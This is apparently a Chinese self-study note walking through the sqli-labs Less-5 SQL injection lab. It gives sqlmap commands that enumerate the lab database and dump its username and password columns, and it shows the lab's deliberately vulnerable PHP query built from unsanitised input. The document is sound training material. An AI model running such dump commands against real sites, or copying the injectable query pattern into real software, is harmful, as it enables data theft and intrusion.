|
目录
类型
-dbs枚举数据库
--tables枚举数据库表
--columns枚举列
--dump枚举数据
查看源代码
类型
单引号注入
单引号报错
猜测sql语句
select * from users where id = ('参数') LIMIT 0,1
-dbs枚举数据库
使用-o参数优化,--batch参数进行跳过,--threads参数开启更多线程
python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-5/?id=1" -o --threads=10 -dbs --batch
dbs
注意,耗时过久,主要是联合查询耗时,从结果看并没有联合查询注入。
--tables枚举数据库表
添加--technique参数加速,--dbms指定
python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-5/?id=1" --dbms mysql --technique E -o --threads=10 -D security --tables --batch
tables
--columns枚举列
python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-5/?id=1" --dbms mysql --technique E -o -D security -T users --columns --batch
columns
--dump枚举数据
python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-5/?id=1" --dbms mysql --technique E -o -D security -T users -C username,password --dump --batch
数据
查看源代码
$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
更多内容查看:网络安全-自学笔记
有问题请下方评论,转载请注明出处,并附有原文链接,谢谢!如有侵权,请及时联系。 | 
转播
